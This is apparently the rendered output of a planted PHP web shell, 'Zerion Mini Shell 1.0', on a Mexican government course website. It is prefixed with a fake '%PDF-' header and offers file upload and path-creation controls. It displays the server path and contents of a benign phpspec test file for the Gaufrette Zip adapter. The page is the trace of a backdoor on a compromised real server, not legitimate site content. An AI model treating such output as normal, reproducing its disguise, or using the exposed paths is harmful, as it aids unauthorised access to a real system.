%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/tjamichg/cursos.tjamich.gob.mx/vendor/knplabs/gaufrette/spec/Gaufrette/Adapter/
Upload File :
Create Path :
Current File : /home/tjamichg/cursos.tjamich.gob.mx/vendor/knplabs/gaufrette/spec/Gaufrette/Adapter/ZipSpec.php

<?php

namespace spec\Gaufrette\Adapter;

use PhpSpec\ObjectBehavior;

class ZipSpec extends ObjectBehavior
{
    function let()
    {
        $this->beConstructedWith('somefile');
    }

    function it_is_adapter()
    {
        $this->shouldHaveType('Gaufrette\Adapter');
    }
}

Zerion Mini Shell 1.0